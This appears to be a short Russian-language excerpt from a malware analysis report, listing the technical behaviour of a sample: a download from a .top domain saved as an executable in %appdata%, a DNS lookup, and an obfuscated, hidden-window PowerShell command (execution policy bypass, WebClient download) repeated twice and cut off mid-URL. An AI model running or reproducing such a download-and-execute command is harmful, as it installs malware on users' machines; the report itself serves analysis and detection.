Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OW^eRShEl^L.EXe^ ^-EX^e^CUTIOn^p^OliCY byP^aS^s -^nOprof^ile ^-^wiNdoWs^Ty^LE Hi^d^DE^N (nEW^-^o^B^je^ct ^sysT^E^M.NEt^.^weBcLie^N^t^).D^owNLOa^Df^iL^E('http://hometower...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "P^OW^eRShEl^L.EXe^ ^-EX^e^CUTIOn^p^OliCY byP^aS^s -^nOprof^ile ^-^wiNdoWs^Ty^LE Hi^d^DE^N (nEW^-^o^B^je^ct ^sysT^E^M.NEt^.^weBcLie^N^t^).D^owNLOa^Df^iL^E('http://hometower...' (со скрытым окном)